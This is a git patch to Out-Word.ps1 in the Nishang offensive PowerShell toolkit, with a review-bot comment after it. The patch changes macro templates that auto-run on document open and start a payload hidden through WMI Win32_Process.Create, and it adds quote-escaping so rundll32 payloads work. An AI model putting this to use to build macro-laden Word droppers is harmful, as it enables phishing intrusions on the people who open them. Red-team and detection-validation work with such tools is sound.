From dc9e0be0ed6a6ba024ad91393127a00e99f13753 Mon Sep 17 00:00:00 2001
From: "Nikhil \"SamratAshok\" Mittal"
Date: Sun, 9 Sep 2018 15:31:21 +0530
Subject: [PATCH] Minor changes to Out-Word to handle payloads
---
 Client/Out-Word.ps1 | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/Client/Out-Word.ps1 b/Client/Out-Word.ps1
index 38339a9..1852ace 100644
--- a/Client/Out-Word.ps1
+++ b/Client/Out-Word.ps1
@@ -309,14 +309,15 @@ https://github.com/samratashok/nishang
 Set objConfig = objStartup.SpawnInstance_
 objConfig.ShowWindow = HIDDEN_WINDOW
 Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
- objProcess.Create $FinalPayload, Null, objConfig, intProcessID
+ objProcess.Create "$FinalPayload", Null, objConfig, intProcessID
 End Function
 "@
 }
 #If the payload is small in size, there is no need of multiline macro.
 else
 {
-
+ # Escape double quotes. Useful for rundll32 payloads where double quotes are used.
+ $FinalPayload = $Payload -replace '"','""'
 $code_one = @"
 Sub Document_Open()
 Execute
@@ -333,7 +334,7 @@ https://github.com/samratashok/nishang
 Set objConfig = objStartup.SpawnInstance_
 objConfig.ShowWindow = HIDDEN_WINDOW
 Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
- objProcess.Create "$Payload", Null, objConfig, intProcessID
+ objProcess.Create "$FinalPayload", Null, objConfig, intProcessID
 End Function
 "@
 }
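Review bot: The comment added in the else branch of the first hunk says what is escaped but not why, and `$FinalPayload` now holds two differently built values depending on the branch, which makes the two `objProcess.Create "$FinalPayload"` lines (first and second hunk) read as if they were equivalent. The doubling is VBA string-literal escaping for the quoted argument, so the comment would be clearer as `# Double embedded quotes: the value is placed inside a VBA string literal below`. In the large-payload branch the same surrounding quotes are added, but `$FinalPayload` is assigned outside this hunk, so whether it is escaped the same way cannot be confirmed from the visible lines. The script help could also record that the generated macro starts its process through WMI `Win32_Process.Create` with `HIDDEN_WINDOW`, so the child is parented by the WMI provider host rather than by Word, which is the relationship a reader validating detections against this output needs to know.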